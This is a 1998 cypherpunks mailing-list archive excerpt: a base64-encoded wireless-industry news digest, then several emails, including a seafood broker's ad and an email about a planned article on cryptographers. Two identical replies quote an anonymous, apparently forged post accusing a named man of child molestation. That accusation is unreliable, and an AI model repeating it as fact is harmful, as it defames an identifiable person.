ZXMvcHJvZmVzc2lvbmFsL2NvbnZlbnRpb24vd3NlY3VyaXR5OTguZ2lmIiBB
TFQ9IlRvZGF5J3MgTmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgU2VjdXJp
dHkgOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NzUgV0lEVEg9MTc1Pjwv
QT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT4KJm5ic3A7CjxUQUJM
RSBCT1JERVI9MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5
Ij4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElB
CkRhaWx5IE5ld3MgZnJvbSBXT1ctQ09NIC0gU2VwdGVtYmVyIDIsIDE5OTg8
L0ZPTlQ+PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkZDQyBH
cmFudHMgQ1RJQZJzIFBldGl0aW9uCmZvciBFeHRlbnNpb24mbmJzcDs8QlI+
Cm9mIE51bWJlciBQb3J0YWJpbGl0eSBEZWFkbGluZXM8L0ZPTlQ+PC9GT05U
PjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIEZlZGVyYWwg
Q29tbXVuaWNhdGlvbnMgQ29tbWlzc2lvbpJzCldpcmVsZXNzIFRlbGVjb21t
dW5pY2F0aW9ucyBCdXJlYXUgaGFzIGdyYW50ZWQgdGhlIENlbGx1bGFyIFRl
bGVjb21tdW5pY2F0aW9ucwpJbmR1c3RyeSBBc3NvY2lhdGlvbpJzIHBldGl0
aW9uIHJlcXVlc3RpbmcgYSBuaW5lLW1vbnRoIGV4dGVuc2lvbiBmb3IgaW1w
bGVtZW50YXRpb24Kb2YgbnVtYmVyIHBvcnRhYmlsaXR5IHJlcXVpcmVtZW50
cyBmb3Igd2lyZWxlc3MgdGVsZXBob25lIHN5c3RlbXMuJm5ic3A7Jm5ic3A7
Cig8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJv
ZmVzc2lvbmFsL25ld3MvZnJhbWVpbmRleC5jZm0/YXJ0aWNsZWlkPTMzODUi
PldPVy1DT008L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5DdXN0b21lciBXYXJucyBQYWNpZmlj
CkJlbGwgTW9iaWxlIFNlcnZpY2VzJm5ic3A7PEJSPgphYm91dCBWb2ljZSBN
YWlsIFNlY3VyaXR5IFByb2JsZW08L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIGNvbXBhbnkncyB0ZW1wb3Jhcnkg
Zml4IGZvciB0aGUgcHJvYmxlbQp3YXMgdG8gbGltaXQgdm9pY2UgbWFpbCBh
Y2Nlc3MgdG8gY3VzdG9tZXJzIGRpYWxpbmcgaW4gZGlyZWN0bHkgdGhyb3Vn
aAp0aGUgUGFjaWZpYyBCZWxsIE1vYmlsZSBTZXJ2aWNlcyB3aXJlbGVzcyBu
ZXR3b3JrLiAoPEEgSFJFRj0iaHR0cDovL3d3dy53aXJlZC5jb20vbmV3cy9u
ZXdzL3RlY2hub2xvZ3kvc3RvcnkvMTQ3MTYuaHRtbCI+V0lSRUQ8L0E+KTwv
Rk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0rMT5TcHJpbnQgV2lucyBBbnRlbm5hIFNpdGUKU3VpdCBhZ2FpbnN0
IER1cmhhbSwgTmV3IEhhbXBzaGlyZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5VLlMuIERpc3RyaWN0IENvdXJ0IEp1
ZGdlIEpvc2VwaCBEaUNsZXJpY28KcnVsZWQgdGhlIHRvd24gaGFkIHRvIHJl
bW92ZSBhbGwgb2JzdGFjbGVzIHRvIGNvbnN0cnVjdGlvbiB3aXRoaW4gNDUg
ZGF5cwphbmQgbmVnb3RpYXRlIHdpdGggU3ByaW50IG92ZXIgcGF5aW5nIHRo
ZSBjb21wYW55J3MgbGVnYWwgZmVlcyB3aXRoaW4gMzAKZGF5cy4gKDxBIEhS
RUY9Imh0dHA6Ly93d3cuYm9zdG9uLmNvbS9kYWlseW5ld3Mvd2lyZWh0bWwv
MjQ1L1NwcmludF93aW5zX2NlbGx1bGFyX3Bob25lX3Rvd2VyX3N1LnNodG1s
Ij5CT1NUT04KR0xPQkU8L0E+KSAtICg8QSBIUkVGPSJodHRwOi8vd3d3LmNt
b25pdG9yLmNvbS9zdG9yaWVzL25ld3Mvc3RhdGUvYWJjX3Rvd2VyMDkwMjk4
LnNodG1sIj5DT05DT1JECk1PTklUT1I8L0E+KSZuYnNwOyAtICg8QSBIUkVG
PSJodHRwOi8vd3d3LmZvc3RlcnMuY29tL25ld3M5OGMvc2VwdGVtYmVyLzAx
L2R1MDkwMWMuaHRtIj5GT1NURVInUwpEQUlMWSBERU1PQ1JBVDwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPkJ1c2luZXNzZXMgVXNlIEdQUyB0bwpUcmFjayBUaGVpciBGbGVl
dHM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+RmxvcmlkYSBpcyBvbmUgb2YgMTQgc3RhdGVzIHRvIGhhdmUgQWVydHJh
eApzZXJ2aWNlLCB3aGljaCBjYW4gcGlucG9pbnQgdGhlIGxvY2F0aW9uIG9m
IGFueSB0cnVjaywgYnVzLCB2YW4gb3IgYm9hdAplcXVpcHBlZCB3aXRoIHRo
ZSBoYXJkd2FyZS4mbmJzcDsgVGhlIHVuaXQgdXNlcyBHUFMgdG8gZGV0ZXJt
aW5lIGl0cyBsb2NhdGlvbiwKYW5kIHRoZSBkYXRhIGlzIHRyYW5zbWl0dGVk
IG92ZXIgQmVsbFNvdXRoJ3MgQ2VsbGVtZXRyeSBEYXRhIFNlcnZpY2UuICg8
QSBIUkVGPSJodHRwOi8vd3d3LmFtY2l0eS5jb20vam91cm5hbHMvaGlnaF90
ZWNoL2phY2tzb252aWxsZS8xOTk4LTA4LTMxL25ld3Njb2x1bW4zLmh0bWwi
PkpBQ0tTT05WSUxMRQpCVVNJTkVTUyBKT1VSTkFMPC9BPik8L0ZPTlQ+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+
MS04MDAtRmxvd2VycyB0byBFeHRlbmQKRGlyZWN0IE1hcmtldGluZyZuYnNw
OzxCUj4KaW50byBEaWdpdGFsIFdpcmVsZXNzIFBob25lczwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5JbiBhIG1vdmUg
dGhhdCBicmluZ3MgdGFyZ2V0ZWQgZGlyZWN0Cm1hcmtldGluZyB0byB1c2Vy
cyBvZiBtb2JpbGUgcGhvbmVzLCBJbnRlbGxpZ2VudCBJbmZvcm1hdGlvbiBJ
bmNvcnBvcmF0ZWQKKElJSSkgYW5ub3VuY2VkIGEgbGFuZG1hcmsgYWdyZWVt
ZW50IHdpdGggMS04MDAtRkxPV0VSUy4mbmJzcDsgKDxBIEhSRUY9Imh0dHA6
Ly9iaXoueWFob28uY29tL3BybmV3cy85ODA5MDEvY3RfODAwX2Zsb18xLmh0
bWwiPllBSE9PPC9BPikmbmJzcDs8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RXJpY3Nzb24gRXhwYW5k
cyBpbiBXaXJlbGVzcwpDb21tdW5pY2F0aW9ucyBNYXJrZXQ8L0ZPTlQ+PC9G
T05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+RXJpY3Nzb24g
c2FpZCBpdCB3b3VsZCBleHBhbmQgaXRzIHdpcmVsZXNzCmRhdGEgYWN0aXZp
dGllcyBieSBlbnRlcmluZyB0aGUgV2lyZWxlc3MgTEFOIChXTEFOKSBtYXJr
ZXQuICg8QSBIUkVGPSJodHRwOi8vZGFpbHluZXdzLnlhaG9vLmNvbS9oZWFk
bGluZXMvdGMvc3RvcnkuaHRtbD9zPXYvbm0vMTk5ODA5MDIvdGMvZXJpY3Nz
b25fMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkJheSBBY3F1aXNpdGlv
biBDcmVhdGVzCk5ldyBOb3J0ZWw8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIGNvbXBhbnkncyBnb2FsIGlzIHRv
IG9mZmVyIG5ldHdvcmtpbmcKcHJvZHVjdHMgdGhhdCBlbmNvbXBhc3Mgd2ly
ZWxlc3MsIHBhY2tldC0gYW5kIGNpcmN1aXQtc3dpdGNoaW5nIHRlY2hub2xv
Z3kKaW4gYSB1bmlmaWVkIG1hbm5lci4gKDxBIEhSRUY9Imh0dHA6Ly93d3cu
emRuZXQuY29tL2ludHdlZWsvZGFpbHkvOTgwOTAxYy5odG1sIj5aRE5FVDwv
QT4pCi0gKDxBIEhSRUY9Imh0dHA6Ly93d3cuaW50ZXJuZXRuZXdzLmNvbS9S
ZXV0ZXJzLzE5OTgvMDkvMDIwMy1ub3J0ZWwuaHRtbCI+SU5URVJORVQKTkVX
Uy5DT008L0E+KSAtICg8QSBIUkVGPSJodHRwOi8vd3d3LnRlY2h3ZWIuY29t
L2ludmVzdG9yL3N0b3J5L0lOVjE5OTgwOTAxUzAwMDMiPlRFQ0hXRUI8L0E+
KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZP
TlQgU0laRT0rMT5DVElBIEFubm91bmNlcyBPZmZpY2lhbApTcG9uc29ycyBv
ZiBXSVJFTEVTUyBJLlQuJm5ic3A7PEJSPgpDb252ZW50aW9uICZhbXA7IEV4
cG88L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+Q1RJQSwgdGhlIENlbGx1bGFyIFRlbGVjb21tdW5pY2F0aW9ucwpJbmR1
c3RyeSBBc3NvY2lhdGlvbiwgdG9kYXkgYW5ub3VuY2VkIHRoZSBvZmZpY2lh
bCBzcG9uc29ycyBvZiA8Qj5XSVJFTEVTUwpJLlQuIDk4PC9CPiwgdGhlIGV4
cG8gYW5kIGNvbnZlbnRpb24gdGhhdCBmb2N1c2VzIG9uIGNvbnZlcmdpbmcg
d2lyZWxlc3MKYW5kIGNvbXB1dGluZyB0ZWNobm9sb2dpZXMuICg8QSBIUkVG
PSJodHRwOi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFs
L25ld3MvZnJhbWVpbmRleC5jZm0/YXJ0aWNsZWlkPTMzOTIiPldPVy1DT008
L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5Ud28gSmFwYW5lc2UgQ2hpcG1ha2VycwpTaHV0IFUu
Uy4gRmFjdG9yaWVzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPk1pdHN1YmlzaGkgRWxlY3RyaWMgaXMgY2xvc2luZyBp
dHMgZmFjdG9yeQppbiBEdXJoYW0sIE4uQy4sIGxheWluZyBvZmYgYWxsIDIz
MCB3b3JrZXJzLiBIaXRhY2hpIHNhaWQgaXQgcGxhbnMgdG8gaWRsZQppdHMg
Y2hpcC1tYWtpbmcgcGxhbnQgaW4gSXJ2aW5nLCBUZXhhcywgaW1tZWRpYXRl
bHkuJm5ic3A7ICg8QSBIUkVGPSJodHRwOi8vd3d3LnRlY2hzZXJ2ZXIuY29t
L25ld3Nyb29tL250bi9pbmZvLzA5MDI5OC9pbmZvM18xMjk4MV9ub2ZyYW1l
cy5odG1sIj5URUNIU0VSVkVSPC9BPikKLSAoPEEgSFJFRj0iaHR0cDovL2Rh
aWx5bmV3cy55YWhvby5jb20vaGVhZGxpbmVzL3RjL3N0b3J5Lmh0bWw/cz12
L25tLzE5OTgwOTAyL3RjL2hpdGFjaGlfMS5odG1sIj5ZQUhPTzwvQT4pCi0g
KDxBIEhSRUY9Imh0dHA6Ly93d3cubmlra2VpLmNvLmpwL2VuZXdzL1ROS1Mv
cGFnZS9Ub3BfU3Rvcmllcy5odG1sI2dlbjEyOSI+TklLS0VJLk5FVDwvQT4p
PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBTSVpFPSsxPkNvbm5lY3RpY3V0IEFwcHJvdmVzCk1lcmdlciBvZiBTQkMm
bmJzcDs8QlI+CmFuZCBTb3V0aGVybiBOZXcgRW5nbGFuZCBUZWxlY29tbXVu
aWNhdGlvbnM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+U3RhdGUgcmVndWxhdG9ycyB1bmFuaW1vdXNseSBhcHByb3Zl
ZAp0aGUgJDQgYmlsbGlvbiBtZXJnZXIgb2YgQ29ubmVjdGljdXQncyBsb2Nh
bCB0ZWxlcGhvbmUgY29tcGFueSBhbmQgU0JDCkNvbW11bmljYXRpb25zIElu
Yy4sIGEgZmFyIGxhcmdlciByZWdpb25hbCB0ZWxlY29tbXVuaWNhdGlvbnMg
ZmlybS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cuZm94bWFya2V0d2lyZS5jb20v
d2lyZXMvMDkwMi9mX2FwXzA5MDJfMTkuc21sIj5GT1gKTkVXUzwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPkNpbmNpbm5hdGkgQmVsbCwgQ29udmVyZ3lzCkFubm91bmNlIE5l
dyBNYW5hZ2VtZW50IFRlYW1zPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPkNpbmNpbm5hdGkgQmVsbCBJbmMuIGFuZCBD
b252ZXJneXMgQ29ycG9yYXRpb24KYW5ub3VuY2VkIHRoZSBmb3JtYXRpb24g
b2YgbmV3IG1hbmFnZW1lbnQgdGVhbXMgaW4gYW50aWNpcGF0aW9uIG9mIHRo
ZQpwbGFubmVkIHNlcGFyYXRpb24gb2YgdGhlIHR3byBjb21wYW5pZXMgd2l0
aGluIHRoZSBuZXh0IGZldyBtb250aHMuICg8QSBIUkVGPSJodHRwOi8vd3d3
Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3MvZnJhbWVp
bmRleC5jZm0/YXJ0aWNsZWlkPTMzOTUiPldPVy1DT008L0E+KTwvRk9OVD48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
Uj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0r
MT5DbGVhcm5ldCBJbnRyb2R1Y2VzIENhbmFkYSdzClNtYWxsZXN0LCBEaWdp
dGFsIFBob25lPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPkNsZWFybmV0IHRvZGF5IGludHJvZHVjZWQgdGhlIE1vdG9y
b2xhCk1pa2UgaTEwMDAsIGEgdGlueSB3aXJlbGVzcyBmbGlwLXBob25lIHRh
cmdldGVkIGZvciB1c2UgYnkgYnVzaW5lc3MgcHJvZmVzc2lvbmFscy4KKDxB
IEhSRUY9Imh0dHA6Ly9iaXoueWFob28uY29tL3BybmV3cy85ODA5MDIvY2xl
YXJuZXRfZF8xLmh0bWwiPllBSE9PPC9BPikmbmJzcDs8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJ
RFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0tMT5Gb3IgYWRkaXRpb25hbCBuZXdzIGFib3V0CnRoZSB3aXJlbGVz
cyBpbmR1c3RyeS0taW5jbHVkaW5nIHBlcmlvZGljIG5ld3MgdXBkYXRlcyB0
aHJvdWdob3V0IHRoZSBkYXktLXZpc2l0CjxBIEhSRUY9Imh0dHA6Ly93d3cu
d293LWNvbS5jb20iPmh0dHA6Ly93d3cud293LWNvbS5jb20uPC9BPjwvRk9O
VD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0tMT5DVElBIERhaWx5IE5ld3MgZnJvbSBX
T1ctQ09NCmlzIHRyYW5zbWl0dGVkIHdlZWtkYXlzLCBleGNlcHQgZm9yIGhv
bGlkYXlzLiBWaXNpdCB1cyBvbiB0aGUgV29ybGQgV2lkZQpXZWIgYXQgPEEg
SFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9wcm9mZXNzaW9uYWwiPmh0
dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lvbmFsPC9BPi4mbmJzcDs8
L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPS0xPklmIHlvdSBhcmUgbm90IGludGVyZXN0
ZWQKaW4gcmVjZWl2aW5nIHRoZSBDVElBIERhaWx5IE5ld3MgZnJvbSBXT1ct
Q09NLCBwbGVhc2Ugc2VuZCBhIG1lc3NhZ2UgdG8KPEEgSFJFRj0ibWFpbHRv
OnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5bWFpbC5jb20iPnVu
am9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5bWFpbC5jb208L0E+LiZu
YnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48Qj4qKio8Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+IFRoZSB0ZXJtICJ1
bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0eW1haWwuY29tIgptdXN0
IGJlIGxpc3RlZCBpbiB0aGUgVE8gc2VjdGlvbiBvZiB0aGUgZW1haWwuPC9G
T05UPjwvRk9OVD4gKioqPC9CPiZuYnNwOwoKPFA+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPlBsZWFzZSBOb3RlOiBTb21l
IG9mIHRoZQpsaW5rcyBpbiB0b2RheSdzIG5ld3MgYXJlIHRpbWUgc2Vuc2l0
aXZlLiZuYnNwOyBUaG9zZSBsaW5rcyBtYXkgbm90IGJlCmF2YWlsYWJsZSBh
cyBuZXdzIGNoYW5nZXMgdGhyb3VnaG91dCB0aGUgZGF5LiZuYnNwOyBBbHNv
LCBzb21lIG5ld3Mgc291cmNlcwptYXkgYmUgc3Vic2NyaXB0aW9uLWJhc2Vk
IG9yIHJlcXVpcmUgcmVnaXN0cmF0aW9uLjwvRk9OVD48L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJ
RFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+CjwvVEFCTEU+CiZu
YnNwOzwvY2VudGVyPgo8L0JPRFk+CjwvSFRNTD4K
--Boundary..3996.1071713804.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Grace <grace@zk3.dec.com>
Date: Wed, 2 Sep 1998 13:00:42 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <9809021950.AA05168@kamlia.zk3.dec.com>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.0Gold (X11; I; OSF1 V4.0 alpha)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Grace <grace@zk3.dec.com>
Date: Wed, 2 Sep 1998 13:07:30 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <9809021951.AA06892@kamlia.zk3.dec.com>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.0Gold (X11; I; OSF1 V4.0 alpha)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 2 Sep 1998 03:58:35 -0700 (PDT)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: toto
In-Reply-To: <v04011709b212770a855c@[139.167.130.246]>
Message-ID: <Pine.GSO.3.96.980902170316.1119A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


After all the warnings! thay still do it.
Anyway that's life.




        @@@@@@@@@@@@@      
       ***************
      **    @   @    **
      **      ^      **
      **      U      **
       ***************
         ***********


To do the right thing(s) for the wrong reason(s) is human,
  To do the right thing(s) for the right reason(s) is divine.


metaphone@altavista.net

On Wed, 2 Sep 1998, Robert Hettinga wrote:

> At 10:15 PM -0400 on 9/1/98, Alia Johnson wrote:
> 
> 
> > My brother, Carl E. Johnson aka C.J.Parker aka toto has asked me to let
> > you know that he is in prison in Florence, Arizona near Tucson under
> > federal charges of threatening the life of a federal officer.
> 
> Oh, boy... Here we go again.
> 
> Cheers,
> Bob Hettinga
> -----------------
> Robert A. Hettinga <mailto: rah@philodox.com>
> Philodox Financial Technology Evangelism <http://www.philodox.com/>
> 44 Farquhar Street, Boston, MA 02131 USA
> "... however it may deserve respect for its usefulness and antiquity,
> [predicting the end of the world] has not been found agreeable to
> experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Glenn Kaggen <glk@idt.net>
Date: Wed, 2 Sep 1998 15:00:31 -0700 (PDT)
To: GK4FISH@aol.com
Subject: New York Metro Coverage
Message-ID: <35EDBCB9.36D4@idt.net>
MIME-Version: 1.0
Content-Type: text/plain


Good Day Seafood Colleagues
I am  looking for additonal products to broker to my customer base of 25
years.  My contacts include most New York accounts on all levels, as
well as good, solid wholesale companies in Boston, Jessup, Washington,
and Philadelphia.  


Please contact me 6 AM to 9 PM, 7 days a week to discuss details

Glenn L Kaggen
Tel 516-822-0758
Fax 516-822-0186
Travel # 516-967-0186
email glk@idt.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 2 Sep 1998 17:39:01 -0700 (PDT)
To: j orlin grabbe <ukcrypto@maillist.ox.ac.uk
Subject: Girolamo Cardano
Message-ID: <35EDE402.1A93@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday 9/2/98 6:19 PM

J Orlin Grabbe

I HOPE to write one of the MOST DEVASTATING, and deserving, ARTICLES
ABOUT 
CRYPTOGRAPHERS EVER WRITTEN. 

By introducing to the public:

		MACHINE COMIBINATORICS

I stand on the shoulders on several GIANTS.  

I searched the web for Cardano.

http://www.lib.virginia.edu/science/parshall/cardano.html

And one SUPERB mathematician

  Ore, Oystein. Cardano: The Gambling Scholar. Princeton: University
Press, 1956. 

I may need your help with Zola.  YOU understand math, Zola MAY not.

Best 
bill
---
Wednesday 9/2/98 6:26 AM 
 
